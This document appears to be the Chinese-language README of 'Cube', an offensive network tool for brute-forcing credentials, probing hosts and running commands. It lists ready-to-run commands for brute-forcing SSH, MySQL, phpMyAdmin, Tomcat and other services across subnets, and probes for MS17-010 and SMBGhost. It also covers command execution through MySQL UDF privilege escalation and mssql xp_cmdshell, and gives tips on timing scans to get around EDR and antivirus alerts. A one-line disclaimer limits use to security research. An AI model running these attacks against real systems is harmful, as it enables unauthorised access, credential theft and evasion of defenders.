Awesome
声明
特别声明:此工具仅限于安全研究,禁止使用该项目进行违法操作,否则自行承担相关责任
特点
- 方便二次开发,快速增加插件
- 支持输出结果到excel文档
- 精简运行参数,方便记忆
一把梭
如果没有耐心看下面的命令选项,运行如下命令,然后打开pwn.xlsx,最终结果会以IP纬度聚合展示:
cube crack -x X -s 192.168.2.1/24 -o /tmp/pwn.xlsx
cube probe -x Y -s 192.168.2.1/24 -o /tmp/pwn.xlsx
cube probe -x K8S -s 192.168.2.1/24 -o /tmp/pwn.xlsx //如果内网存在k8s,会扫描2379,10250,6443端口
全局参数
-v: 输出内容更详细,一般用于调试-n: 设定crack和probe模块的运行线程数量,默认30线程--delay: 设定此选项参数为n的时候,crack和probe模块强制设为单线程,在线程运行之间休眠n秒,用于绕过EDR
0x1. crack模块
使用内置词典爆破SSH
cube crack -s 192.168.1.1 -x ssh
指定用户密码爆破SSH
cube crack -l root,ubuntu -p 123,000111,root -x ssh -s 192.168.1.1
cube crack -L user.txt -P pass.txt -s 192.168.1.1/24 -x ssh
cube crack -l root -P pass.txt -s 192.168.1.1/24 -x ssh
指定端口爆破SSH
cube crack -l root -p root -s 192.168.1.1 -x ssh --port 2222
使用内置词典爆破ssh和mysql
# 爆破mysql和ssh(注意ssh和mysql之间的逗号不存在空格)
cube crack -s 192.168.1.1 -x ssh,mysql
爆破phpmyadmin(不可与其它插件组合)
cube crack -s http://192.168.2.1 -x phpmyadmin
爆破tomcat(不可与其它插件组合)
cube crack -x httpbasic -s http://127.0.0.1:7788/manager -v
加载全部爆破插件(httpbasic/jenkins/phpmyadmin/zabbix除外)
cube crack -x X -s 192.168.1.1
- phpmyadmin这类http的爆破插件只能单独使用,不可与其它插件同时加载,类似的插件有:
httpbasic/jenkins/phpmyadmin/zabbix httpbasic模块是用来爆破使用basic auth认证的服务,比如tomcat登录,nginx的basic auth-x X是加载全部可用的爆破插件,先检查端口,端口开放之后爆破- 未指定用户密码的时候,会加载内置词典
zabbix插件没有卵用,爆破5次失败之后会锁定30s- 默认线程是30,这种情况下爆破会触发x绒的告警,建议设定为10~15
支持的爆破插件
- 可组合使用:
elastic/ftp/mongo/mssql/mysql/postgres/redis/smb/ssh - 不可组合使用:
httpbasic/jenkins/phpmyadmin/zabbix
0x2. probe模块
加载全部默认插件
# -x Y的时候加载全部probe插件, -x -X只会加载部分默认插件
cube probe -x X -s 192.168.2.1/24
cube probe -x Y -s 192.168.2.1/24
加载指定插件
# 加载oxid,ms17010插件
cube probe -x oxid,ms17010 -s 192.168.2.1/24
# 加载WIN集合插件,WIN集合插件下有 ping,netbios,oxid,smb,winrm,wmi,mssql
cube probe -x WIN -s 192.168.2.1/24
支持的探测插件
| FUNC | PORT | LOAD BY X |
|---|---|---|
| docker | 2375 | Y |
| dubbo | 20880 | Y |
| etcd | 2379 | Y |
| k8s10250 | 10250 | N |
| k8s6443 | 6443 | N |
| ms17010 | 445 | Y |
| mssql | 1433 | N |
| netbios | 137 | N |
| oxid | 135 | Y |
| ping | N | |
| rmi | 1099 | Y |
| smb | 445 | Y |
| smbghost | 445 | Y |
| winrm | 5985 | N |
| wmi | 135 | N |
| zookeeper | 2181 | Y |
| jboss | 3873 | Y |
| prometheus | 9090 | Y |
smb/wmi/winrm/mssql是利用NTLM认证过程获取Windows版本系统信息- 使用
ping/netbios的时候,最好单独使用获取更准确的结果,线程数量建议为10 Load By X: 是指cube probe -x X -s 192.168.2.1/24的时候,-x X是否需要加载的插件
0x3. 结果输出
在使用crack和probe模块的任何插件都可以加上-o result.xlsx,用于把结果写入到excel,当excel已经存在
的时候,cube会把当前扫描的结果自动追加到文档,建议扫描结束之后的文档固定首行首列,查看更方便。
0x4. 快速开发
Crack模块
Crack模块可以抽象为一个爆破的框架,当需要爆破的插件不在Cube可用插件列表里面,可以使用go快速开发爆破插件。
crack模块下的命令参数同样适用新增的插件,比如-l/-L,-p/-P,--port。 比如新增一个自定义爆破插件,插件名是cloud,默认端口8080,爆破的默认密码使用内置的config.PASSWORDS,插件需要实现crack模块的以下接口:
CrackName() string //插件名称
CrackPort() string //插件默认端口
CrackAuthUser() []string //插件默认爆破的用户名
CrackAuthPass() []string //插件默认爆破的密码,可以使用config.PASSWORD
IsMutex() bool //是否是只能单独使用的插件,比如爆破phpmyadmin类的http插件,当然elastic是个例外
CrackPortCheck() bool //是否需要端口检查,TCP协议设置为true,phpmyadmin单独使用的插件和UDP协议类的跳过端口检测,设置为false
Exec() CrackResult //爆破插件的具体实现
- 如果需要
-x X加载cloud, 修改config/config.go,把cloud加入到CrackX列表里面
Probe模块
同样新增Probe插件和crack类似,也可以看作信息收集的框架,新增的插件需要实现以下接口:
ProbeName() string //插件名称
ProbePort() string //插件默认端口
PortCheck() bool //是否需要端口检查
ProbeExec() ProbeResult //执行插件
0x5 Sqlcmd模块
用于mysql的UDF提权(暂时支持windows x64),mssql命令执行:
#开启UDF执行命令
cube sqlcmd -x mysql -l root -p root -e "whoami"
#清除xp_cmdshell
cube sqlcmd -x mysql -l root -p root -e "clear"
#指定mssql端口
cube sqlcmd -x mssql -l sa -p sa -e "whoami" --port 4134
可用插件
参考
TODO
-m ls <dst path>
-m cat <dst file>
-m upload <src path> <dst path>
-m exec <cmd string>
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql exec "whoami"
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql upload <src> <dst>
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql ls <src>
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql cat <src>
- 检查某个方法是否实现了接口
- probe模块下的mssql探测好像存在问题,需要确认
Stargazers over time
